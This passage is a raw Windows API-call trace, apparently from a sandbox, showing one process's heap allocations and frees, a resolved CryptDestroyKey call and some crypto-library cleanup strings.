[0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.845] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.845] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.845] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.845] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0075.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0075.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0075.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x76ad60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0075.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.846] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyKey") returned 0x7771c51a [0075.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0075.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0075.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0075.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0075.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.846] CryptDestroyKey (hKey=0x6b8ab8) returned 1 [0075.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0075.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0075.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0075.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0075.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0075.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.850] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0075.850] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.850] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.850] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.850] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0075.850] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.850] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1ca8 [0075.850] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1ca8 | out: hHeap=0x650000) returned 1 [0075.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.850] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0075.850] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0075.850] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.850] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0075.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0075.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0075.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1ca8 [0075.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1ca8 | out: hHeap=0x650000) returned 1 [0075.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.851] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76acb8 [0075.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.851] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e168 [0075.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e438 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ace8 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76aa30 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e6d8 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76df58 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b0d8 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e150 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.853] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e168 [0075.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0075.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0075.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0075.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0075.855] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.855] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0075.855] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.855] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0075.855] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.855] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.855] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792010 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0075.856] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.856] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0075.856] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.856] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e240 [0075.856] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.856] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.856] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.856] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.856] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e540 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.857] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.857] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.857] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.857] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76abc8 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e5d0 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ab68 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e480 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76df28 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76a970 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e000 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.857] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.857] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.857] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.857] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.857] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.857] HeapFree (in: hHeap=0x650000, dwFlags=0x0, 